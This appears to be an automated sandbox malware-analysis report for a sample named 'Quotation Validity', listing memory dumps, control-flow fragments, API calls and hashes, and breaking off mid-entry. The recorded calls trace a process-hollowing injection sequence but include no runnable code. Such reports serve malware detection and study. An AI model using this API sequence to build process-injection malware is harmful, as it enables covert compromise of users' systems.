                                                                                • Source File: 00000002.00000002.1302052576.0000000001820000.00000040.00000800.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1820000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: Current$ProcessThread
                                                                                • String ID:
                                                                                • API String ID: 2063062207-0

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 078A9DA6
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 078A9DA6
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0182B51E
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1302052576.0000000001820000.00000040.00000800.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1820000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 032D1EE2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1302652584.00000000032D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_32d0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 032D1EE2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1302652584.00000000032D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_32d0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 01825E89
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1302052576.0000000001820000.00000040.00000800.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1820000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0

                                                                                Control-flow Graph

                                                                                control_flow_graph 919 32d1324-32d43dc 922 32d448c-32d44ac call 32d11fc 919->922 923 32d43e2-32d43e7 919->923 930 32d44af-32d44bc 922->930 925 32d43e9-32d4420 923->925 926 32d443a-32d4472 CallWindowProcW 923->926 933 32d4429-32d4438 925->933 934 32d4422-32d4428 925->934 928 32d447b-32d448a 926->928 929 32d4474-32d447a 926->929 928->930 929->928 933->930 934->933
                                                                                APIs
                                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 032D4461
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1302652584.00000000032D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_32d0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: CallProcWindow
                                                                                • String ID:
                                                                                • API String ID: 2714655100-0

                                                                                Control-flow Graph

                                                                                control_flow_graph 936 1824544-1825e99 CreateActCtxA 939 1825ea2-1825efc 936->939 940 1825e9b-1825ea1 936->940 947 1825f0b-1825f0f 939->947 948 1825efe-1825f01 939->948 940->939 949 1825f20 947->949 950 1825f11-1825f1d 947->950 948->947 952 1825f21 949->952 950->949 952->952
                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 01825E89
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1302052576.0000000001820000.00000040.00000800.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1820000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0

                                                                                Control-flow Graph

                                                                                control_flow_graph 953 82e7668-82e768d call 82e420c 956 82e768f-82e769f 953->956 957 82e76a2-82e7734 CreateIconFromResourceEx 953->957 961 82e773d-82e775a 957->961 962 82e7736-82e773c 957->962 962->961
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307768451.00000000082E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_82e0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFromIconResource
                                                                                • String ID:
                                                                                • API String ID: 3668623891-0

                                                                                Control-flow Graph

                                                                                control_flow_graph 975 82e6810-82e6864 977 82e686f-82e687e 975->977 978 82e6866-82e686c 975->978 979 82e6883-82e68bc DrawTextExW 977->979 980 82e6880 977->980 978->977 981 82e68be-82e68c4 979->981 982 82e68c5-82e68e2 979->982 980->979 981->982
                                                                                APIs
                                                                                • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,082E67FD,?,?), ref: 082E68AF
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307768451.00000000082E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_82e0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: DrawText
                                                                                • String ID:
                                                                                • API String ID: 2175133113-0

                                                                                Control-flow Graph

                                                                                control_flow_graph 965 82e419c-82e6864 967 82e686f-82e687e 965->967 968 82e6866-82e686c 965->968 969 82e6883-82e68bc DrawTextExW 967->969 970 82e6880 967->970 968->967 971 82e68be-82e68c4 969->971 972 82e68c5-82e68e2 969->972 970->969 971->972
                                                                                APIs
                                                                                • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,082E67FD,?,?), ref: 082E68AF
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307768451.00000000082E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_82e0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: DrawText
                                                                                • String ID:
                                                                                • API String ID: 2175133113-0
                                                                                APIs
                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 078A9978
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                APIs
                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 078A9978
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0182D82F
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1302052576.0000000001820000.00000040.00000800.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1820000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                APIs
                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 078A97CE
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                APIs
                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 078A97CE
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                APIs
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 078A9A58
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessRead
                                                                                • String ID:
                                                                                • API String ID: 1726664587-0
                                                                                APIs
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 078A9A58
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessRead
                                                                                • String ID:
                                                                                • API String ID: 1726664587-0
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0182D82F
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1302052576.0000000001820000.00000040.00000800.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1820000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                APIs
                                                                                • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,082E7682,?,?,?,?,?), ref: 082E7727
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307768451.00000000082E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_82e0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFromIconResource
                                                                                • String ID:
                                                                                • API String ID: 3668623891-0
                                                                                APIs
                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 078A9896
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                APIs
                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 078A9896
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                • Opcode ID: 26203d7eff937ed042d04fef274c9a6485169d58b5680864f9bf05e3a63f03b9
                                                                                • Instruction ID: 97ab3b859c37af869dd28e671cf07cbc7716d7073f55edde60682862c9f52768
                                                                                • Opcode Fuzzy Hash: 26203d7eff937ed042d04fef274c9a6485169d58b5680864f9bf05e3a63f03b9
                                                                                • Instruction Fuzzy Hash: 811166B1D043498FDB20DFAAC4457EEFBF5EF88320F248819C519A7240CB79A944CBA4
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                • Opcode ID: 6d338f76118a9728dbea41ce3cafcf0b1a842e105443a81dd9ba52c9c9a1bcf2
                                                                                • Instruction ID: f79e28080f9f6b785905e59a940fad99adf76a70af10a88a3ef1ac2c48cb9fb1
                                                                                • Opcode Fuzzy Hash: 6d338f76118a9728dbea41ce3cafcf0b1a842e105443a81dd9ba52c9c9a1bcf2
                                                                                • Instruction Fuzzy Hash: 151158B5D003598FDB20DFAAC4457EEBBF5AF88224F24882AC519A7240C779A545CB94
                                                                                APIs
                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0182B51E
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1302052576.0000000001820000.00000040.00000800.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1820000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: 6a94480a4a7cb590ac9ff95aaf7b356763c0a53012d5442762e25bcc36a5bb36
                                                                                • Instruction ID: 8c5a037301b9ee512a05bc5840d5ad1de4ccde61dc8b259ec7af3e1679a6aa1a
                                                                                • Opcode Fuzzy Hash: 6a94480a4a7cb590ac9ff95aaf7b356763c0a53012d5442762e25bcc36a5bb36
                                                                                • Instruction Fuzzy Hash: E5110FB6C012598FDB20CF9AD444BDEFBF4AF88314F14842AD929A7200D375A645CFA1
                                                                                APIs
                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 078ABED5
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePost
                                                                                • String ID:
                                                                                • API String ID: 410705778-0
                                                                                • Opcode ID: 0c38999da9836a66d13c1a539f2af90a83b1eca40eb3c22009fab669ece85269
                                                                                • Instruction ID: 7aa73862489f1a74356865fa7c59da50cdadfc811d3b8cd2f03b2c14c4c00235
                                                                                • Opcode Fuzzy Hash: 0c38999da9836a66d13c1a539f2af90a83b1eca40eb3c22009fab669ece85269
                                                                                • Instruction Fuzzy Hash: 6311F5B5900349AFDB20DF9AC445BEEBFF8EB58314F108419E914A7200D375A954CFA5
                                                                                APIs
                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 078ABED5
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePost
                                                                                • String ID:
                                                                                • API String ID: 410705778-0
                                                                                • Opcode ID: c821bbe10f00da09e352cba82e8be5f2a65b4a1e90c015ffbc8574d8648ecad5
                                                                                • Instruction ID: 850336ba928a1e403054e70c9d80a711815473f1e9020183d193ce0c59de4480
                                                                                • Opcode Fuzzy Hash: c821bbe10f00da09e352cba82e8be5f2a65b4a1e90c015ffbc8574d8648ecad5
                                                                                • Instruction Fuzzy Hash: 0F1103B9800349DFDB20CF99C585BDEBBF4FB18310F10881AD518A7210D375A594CFA1
                                                                                APIs
                                                                                • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,082E6371,?,?), ref: 082E6518
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307768451.00000000082E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_82e0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandle
                                                                                • String ID:
                                                                                • API String ID: 2962429428-0
                                                                                • Opcode ID: de06b0df637a148638dfc63a8eb96309fa3db3ee1c1792a618ab13df2d4952fe
                                                                                • Instruction ID: 1a83c443e22e987aceb8e369756cc45bd0ae5e46dfcd5bea8d085323e7d76070
                                                                                • Opcode Fuzzy Hash: de06b0df637a148638dfc63a8eb96309fa3db3ee1c1792a618ab13df2d4952fe
                                                                                • Instruction Fuzzy Hash: AC1136B59003498FDB20DF9AC545BEEFBF4EB58324F20841AE958A7340D379A944CFA5
                                                                                APIs
                                                                                • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,082E6371,?,?), ref: 082E6518
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307768451.00000000082E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_82e0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandle
                                                                                • String ID:
                                                                                • API String ID: 2962429428-0
                                                                                • Opcode ID: 3c4eb0fa53147c879ae9531efbc207ee2928773340b3a5f67818ac539227e1fd
                                                                                • Instruction ID: 8ffba335cff657cf521cb723236287369109651f7c455c4b8feb751d554b44b0
                                                                                • Opcode Fuzzy Hash: 3c4eb0fa53147c879ae9531efbc207ee2928773340b3a5f67818ac539227e1fd
                                                                                • Instruction Fuzzy Hash: B51148B69003498FDB20DF9AC545BDEBBF4EB48320F248419E958A7340C378A944CFA5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: dPT
                                                                                • API String ID: 0-719868170
                                                                                • Opcode ID: 43810bc3ebf877ac8a60c960946927be0ccde3b86746e7c4c848700a93deddea
                                                                                • Instruction ID: 5a3a6fa9f35ab5d1bc95e933e2bb946a3c1280580de1b8e990b3385bd83c9c1e
                                                                                • Opcode Fuzzy Hash: 43810bc3ebf877ac8a60c960946927be0ccde3b86746e7c4c848700a93deddea
                                                                                • Instruction Fuzzy Hash: 7FE1D4B4E142199FEB14CFA9C580AAEBBF2FF89304F248169D414AB355D735AD41CFA0
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f7e8c2d03758082e37dba2c3f6bca9606082f6f9a9bf0a10d472f404600496e5
                                                                                • Instruction ID: 4e5a1dfe5ad7d68bdf8a4a050c467b34fc117b07a72720fbd9b1873ed4907d0f
                                                                                • Opcode Fuzzy Hash: f7e8c2d03758082e37dba2c3f6bca9606082f6f9a9bf0a10d472f404600496e5
                                                                                • Instruction Fuzzy Hash: 2CE1D8B4E102199FDB14DFA9C580AAEBBF2FF89304F248169D414AB355D734AD41CF60
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8fdc3ccf5c02e8e6cc3b64a60f851ac0b36f3466d5bd43131823f012d3a12a60
                                                                                • Instruction ID: e95664e10e04e6e8a2ad78039912bac56183507375d46555bd6652fd5cb2b9ac
                                                                                • Opcode Fuzzy Hash: 8fdc3ccf5c02e8e6cc3b64a60f851ac0b36f3466d5bd43131823f012d3a12a60
                                                                                • Instruction Fuzzy Hash: 9FE1F6B4E106199FEB14CFA9C580AAEBBF2FF89304F248169D414AB355D735AD41CFA0
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2c6632fe3210ddce996ec80cc17b43d9f98359586246d3e8180a45913d2a6414
                                                                                • Instruction ID: 7ed9f010f1733b4030c9654b38e8544b6e00d3428c218bdc61433c8767e459b7
                                                                                • Opcode Fuzzy Hash: 2c6632fe3210ddce996ec80cc17b43d9f98359586246d3e8180a45913d2a6414
                                                                                • Instruction Fuzzy Hash: 7EE1E8B4E102199FEB14CFA9C580AAEBBF2FF89304F248169E415AB355D735AD41CF60
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a0a157c27ca93ac9be42afae0fa1b25285ad7b1bc8434214edb24fcc34621eb4
                                                                                • Instruction ID: d06809271b25455bd78069878056aef31d6cf7dbeae78821703ecc344f8600a4
                                                                                • Opcode Fuzzy Hash: a0a157c27ca93ac9be42afae0fa1b25285ad7b1bc8434214edb24fcc34621eb4
                                                                                • Instruction Fuzzy Hash: 7FE1F8B4E106199FEB14CFA9C580AAEBBF2FF89304F248169E414AB355D735AD41CF60
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1302652584.00000000032D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_32d0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9c21304a40b06f90a2c80aa1641e5aa1d35cfe610ff0cd8bab3e2096ef656fdc
                                                                                • Instruction ID: e6f259bbcc54a87f3162435d34c36ac19abe423f3e321d41b45879dbb23e79d1
                                                                                • Opcode Fuzzy Hash: 9c21304a40b06f90a2c80aa1641e5aa1d35cfe610ff0cd8bab3e2096ef656fdc
                                                                                • Instruction Fuzzy Hash: BFD1093182075A8ADB10EB64D9906ADB7B1FF96300F50C79AD5497B220EFB0AEC5CF51
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1302052576.0000000001820000.00000040.00000800.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1820000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: be99c023d23cbee5531a1dce5b1119a69a8afeda9a0a6ae3dba9b4d5eb6c7afe
                                                                                • Instruction ID: 3796891a44821b56e283e4764a17be46b3cf09f88fa95b5e705827663208a843
                                                                                • Opcode Fuzzy Hash: be99c023d23cbee5531a1dce5b1119a69a8afeda9a0a6ae3dba9b4d5eb6c7afe
                                                                                • Instruction Fuzzy Hash: F7A18F36E0062A8FCF16DFB8C8405DEB7B2FF85301B24456AE901EB265DB71DA85CB40
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1302652584.00000000032D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_32d0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d91134a0fd6543ccd62219ddff253235f28423ec806c018596bf8917d064c4f2
                                                                                • Instruction ID: b452ed1af3ee792d70875e51f71656421f120961088ad04bc995ab601110348e
                                                                                • Opcode Fuzzy Hash: d91134a0fd6543ccd62219ddff253235f28423ec806c018596bf8917d064c4f2
                                                                                • Instruction Fuzzy Hash: 4BD1093182075A8ADB10EB64D99069DB7B1FF96300F50C79AD5497B220EFB0AEC5CF51
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307768451.00000000082E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_82e0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a06aa56946b9a5e6b096f393f5a005aae7fc54fc8f96b2177ef9da88d5dbd014
                                                                                • Instruction ID: a50f946467ccc22a27bff849100db6a3238c07f1ad731e44c72ea6653a469776
                                                                                • Opcode Fuzzy Hash: a06aa56946b9a5e6b096f393f5a005aae7fc54fc8f96b2177ef9da88d5dbd014
                                                                                • Instruction Fuzzy Hash: A1A15E74A00209DFDB54EFB4C4547AEB7F6FF88301F508529E409AB394DA74AD42CBA1
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307768451.00000000082E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_82e0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 405de00bfdb728ac0172bee180f1e4a2715be25aded9f6d6855046626717d7ba
                                                                                • Instruction ID: 17a04caab882e43718ea41f9868f96ed42a907a9d4ce4870ecae1657548dd6d5
                                                                                • Opcode Fuzzy Hash: 405de00bfdb728ac0172bee180f1e4a2715be25aded9f6d6855046626717d7ba
                                                                                • Instruction Fuzzy Hash: 67B16275E006198FDB58CF6AC984ADDBBF2BF89301F14C1A9D809AB325DB345E858F50
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1302652584.00000000032D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_32d0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8413d3ad4a4c3572baea1d46d646355b5a7ea563073746ff7650157630331afe
                                                                                • Instruction ID: 9661728868665ab4212405d48276b223f541c5434f12b3ccb3cf57d86671e82c
                                                                                • Opcode Fuzzy Hash: 8413d3ad4a4c3572baea1d46d646355b5a7ea563073746ff7650157630331afe
                                                                                • Instruction Fuzzy Hash: 62C1E8B84117458FE720CF65E84828D7BB1BF85329F514329D1A16B2E9DFB8168BCF48
                                                                                Memory Dump Source
